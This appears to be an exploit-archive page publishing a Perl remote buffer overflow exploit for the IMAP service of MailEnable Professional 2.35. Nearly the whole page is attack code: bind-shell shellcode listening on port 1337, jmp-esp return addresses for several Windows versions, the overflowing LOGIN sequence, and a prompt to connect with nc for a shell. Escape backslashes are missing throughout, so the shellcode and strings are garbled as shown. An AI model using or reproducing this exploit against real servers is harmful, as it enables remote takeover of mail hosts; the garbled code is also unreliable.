[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MailEnable Professional 2.35 Remote Buffer Overflow Exploit
# Published : 2007-02-16
# Author : mu-b
# Previous Title : MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit
# Next Title : Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional <=v2.35 (win32) remote exploit
# by mu-b - Tue Dec 5 2006
#
# - Tested on: Mail Enable Professional v2.35 (win32)
#
# Note: timing is quite critical with this!!, so change $send_delay
# if it doesn't work....
#
########
use Getopt::Std; getopts('t:n:', %arg);
use Socket;
# metasploit win32 bindshell port 1337
my $zshell_win32_bind =
"x33xc9x83xe9xb0".
"x81xc4xd0xfdxffxff".
"xd9xeexd9x74x24xf4x5bx81x73x13x1d".
"xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
"xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
"x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
"xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
"x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
"x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
"x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
"xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
"x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
"x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
"x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
"x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
"xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
"x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
"xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
"x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
"xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
"x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
"xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
"x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
"x4ex33xe4x96xcdxccx32x69";
# ff e4 -> jmp %esp
my @offsets = ( "xf8xfex5ax7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
"xe2x48xe6x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
"x06x38xe6x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
"xd9xaex80x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
"x62x51xebx77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
"xefxbexadxde" # DoS
);
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 1;
my $NOP = 'A';
my $START_PAD = 547;
my $SHELL_PAD = 12;
if (connect_host($target, $imapd_port)) {
print("-> * Connectedn");
$buf = "A001 LOGIN {24}";
send(SOCKET, $buf."rn", 0);
sleep($send_delay);
print("-> * Sending payloadn");
send(SOCKET, "AAAAAAAAAAAAAAAAA{20}rn", 0);
sleep($send_delay);
send(SOCKET, "BBBBBBBBBBBBBBBBBBrn", 0);
sleep($send_delay);
$buf = ($NOP x $START_PAD).# padding
$offset. # EIP
($NOP x $SHELL_PAD).
$zshell_win32_bind. # hellcode
($NOP x (0x3ff-$START_PAD-$SHELL_PAD-4-length($zshell_win32_bind)));
send(SOCKET, $buf, 0);
print("-> * Successfully sent payload!n");
print("-> * nc ".$target." 1337 for shell...n");
}
sub print_header {
print("MailEnable Pro <=v2.35 remote exploitn");
print("by: <mu-b@digit-labs.org>nn");
}
sub usage {
print(qq(Usage: $0 -t <hostname>
-t <hostname> : hostname to test
-n <num> : return addy offset number
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!n");
$proto = getprotobyname('tcp') || die("Error: $!n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!n");
connect(SOCKET, $paddr) || die("Error: $!n");
return(1338);
}
# www.Syue.com [2007-02-16]